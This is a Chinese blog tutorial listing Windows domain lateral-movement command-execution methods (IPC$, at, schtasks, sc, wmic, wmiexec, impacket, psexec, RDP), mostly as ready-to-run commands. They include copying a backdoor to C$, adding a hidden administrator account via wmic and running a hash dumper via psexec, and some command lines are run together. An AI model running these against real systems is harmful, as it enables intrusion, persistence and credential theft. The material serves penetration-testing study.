内网渗透之域渗透命令执行总结

前言

AD的全称是Active Directory:活动目录

域(Domain)是Windows网络中独立运行的单位,域之间相互访问则需要建立信任关系(即Trust Relation)。信任关系是连接在域与域之间的桥梁。当一个域与其他域建立了信任关系后两个域之间不但可以按需要相互进行管理,还可以跨网分配文件和打印机等设备资源,使不同的域之间实现网络资源的共享与管理,以及相互通信和数据传输。

在域渗透场景中,我们已经进入内网,会遇到大量的开放端口和服务,弱密码空密码,这个时候我们可以使用它们已经开启的服务选择对应的方式进行命令执行。本文对ad域渗透中常见的命令执行方式进行一个总结。

ipc

前提

开启ipc共享

配置本地安全策略:开始->运行-> secpol.msc->本地策略->安全选项->网络访问:共享>和本地帐户的安全模型>经典-本地用户进行身份验证

配置本地组策略:运行gpedit.msc ——计算机配置——Windows设置——安全设置——本地策略
    ——安全选项——用户账户控制:以管理员批准模式运行所有管理员——禁用。

文件共享

写入后门文件net use z: \\目标IP\c$ 'passwd' /user:'admin'copy hack.bat \\目标ip\c$#删除连接net use \\目标IP\ipc$ /del

后续使用下面的方式执行

at(win10不可用)

定时任务执行命令

前提

开启windows Event log服务,开启Task Scheduler服务

其余条件同ipc

命令执行

at \\170.170.64.19 23:00 c:\windows\system32\calc.exeat \\170.170.64.19 1 delete /yes #删除本机1号任务

schtasks

前提

开启windows Event log服务,开启Task Scheduler服务

其余条件同ipc

schtasks /create /tn firstTask /tr 'c:\windows\system32\cmd.exe /c calc' /sc once /st 00:00 /S 170.170.64.19 /RU System /u admin /p passwdschtasks /run /tn firstTask /S 170.170.64.19 /u admin /p passwdschtasks /F /delete /tn firstTask /S 170.170.64.19 /u admin /p passwd

telnet

前提

开启telnet服务

命令执行

telnet 目标ip之后可执行命令

sc

windows2003windows XP

命令执行

sc \\170.170.64.19 create testSC binPath= 'cmd.exe /c start c:\windows\hack.bat'sc \\170.170.64.19 start testSCsc \\170.170.64.19 delete testSC

wmic

前提

开启wmi服务,135端口

命令执行

wmic /node:170.170.64.19 /user:admin /password:passwd process call create 'cmd.exe /c calc.exe'
wmic /node:170.170.64.19 /user:admin /password:passwd process call create 'cmd.exe /c net user test 123456 /add && net localgroup administrators test /add'

wmiexec.vbs(需要安装)

前提

开启wmi服务,135端口

安装

下载vmiexec.vbs

命令执行

cscript.exe //nologo wmiexec.vbs /shell 170.170.64.19 admin passwdcscript.exe wmiexec.vbs /cmd 170.170.64.19 admin passwd 'cmdkey /list'cscript.exe wmiexec.vbs /cmd 170.170.64.19 admin passwd c:\programdata\test.bat#其他参数-wait5000 表示这个命令等待5s后再读取结果,用于运行“运行时间长”的命令。-persist 程序会在后台运行,不会有结果输出,而且会返回这个命令进程的 PID,方便结束进程,用于运行 nc 或者木马程序。

impackets wmiexec(需要安装)

前提

开启wmi服务,135端口

安装

git clone https://github.com/SecureAuthCorp/impacket/pip install -r requirements.txtpip install impacket

命令执行

#获取远程计算机交互式shellpython wmiexec.py admin:passwd@170.170.64.19

psexec(需要安装)

前提

开启admin$共享

安装

在 https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

下载安装

命令执行

#打开交互式shellpsexec \\170.170.64.19 -u admin -p passwd cmd#执行单条命令psexec \\170.170.64.19 -u admin -p passwd -s cmd /c 'calc.exe'#拷贝文件到远程计算机并执行psexec \\170.170.64.19 -u admin -p passwd -c C:\Users\Administrator\Desktop\GetHashes.exe
#其他参数–accepteula 第一次运行会弹框,输入这个参数便不会弹框-s 以 “nt authority\system” 权限运行远程进程-h 如果可以,以管理员权限运行远程进程-d 不等待程序执行完就返回,请只对非交互式应用程序使用此选项\\ip 可以替换成 @ip.txt (存放多个 ip 的文本),可以批量执行命令

远程桌面

前提

开启远程桌面,3389端口

命令执行

可直接通过mstsc进入目标系统。

作者:Leticia,文章来源:Leticia's Blog
(0)

相关推荐

  • Windows Server 2008R2关闭/打开默认windows共享

    Windows启动时都会默认打开admin$ ipc$ 和每个盘符的共享,对于不必要的默认共享,一般都会把它取消掉,可当又需要打开此默认共享时,又该从哪里设置呢,一般来说有两个地方,MSDOS命令和计 ...

  • 记一次渗透内网获取域控的过程

    渗透目标:获取域控内某台ftp服务器中的文件 0x01入口 钓鱼附件的形式获得了一个meterpreter 收集信息发现:当前用户为user,user在管理组里面,这种可以通过bypassuac提权到 ...

  • 内网域渗透工具

    文章来源:系统安全运维 推荐一内网域渗透工具: 1.工具目录: 2.使用方式: 1)NetLocalGroupGetMembers 功能:查询目标服务器本地管理组的成员 2)NetLocalGroup ...

  • 【内网渗透】内网信息收集命令汇总

    学习整理了一些资料,一直想发来着,奈何自己太lan 后续会慢慢分享给大家 1)查询网络配置详细信息 ipconfig /all 2)获取操作系统和版本信息 systeminfo | findstr / ...

  • 全网最全的Cobalt Strike使用教程-内网渗透之信息收集篇

    一.前言 从本篇文章开始,斗哥将向大家详细的介绍cobalt Strike 这款工具在内网渗透中的具体使用方式,因为涉及的内容较多,大致会分为信息收集篇.横向渗透篇.域控攻击篇.权限维持篇,在本篇文章 ...

  • 内网渗透测试:初探远程桌面的安全问题

    乌雲安全 81篇原创内容 公众号 前言 远程桌面对了解内网渗透的人来说可能再熟悉不过了.在渗透测试中,拿下一台主机后有时候会选择开 3389 进远程桌面查看一下对方主机内有无一些有价值的东西可以利用. ...

  • 实战讲解内网渗透思路

    声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,如需转载,联系开白.请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众 ...

  • 内网渗透之DNS隧道技术

    声明:请勿利用文中相关技术非法测试,如因此产生的一切不良后果与文章作者及本公众号无关! 01 前言 在渗透目标中过程中,可能碰有些网络的防火墙设置只允许端口53的UDP流量,就不能通过tcp搭建隧道, ...

  • 内网基础知识及域环境搭建

    前言 民国三年等不到一场雨,此生等不到表哥一句我带你. 目录 * 1.工作组 * 2.域 * 3.活动目录 * 4.安全域的划分 * 5.域中计算机的分类 * 6.域内权限 * 7.A-G-DL-P策 ...

  • 教育网安全观察丨第8003号自治域引发内网安全风险

    从今年1月20日开始,一个实体通过AS8003自治域号向外发布BGP路由,宣告启用了之前未启用的IP地址段. 截至4月20日,这个自治域对外宣告的路由信息已占到全球IPv4路由表的5.7%,涉及的IP ...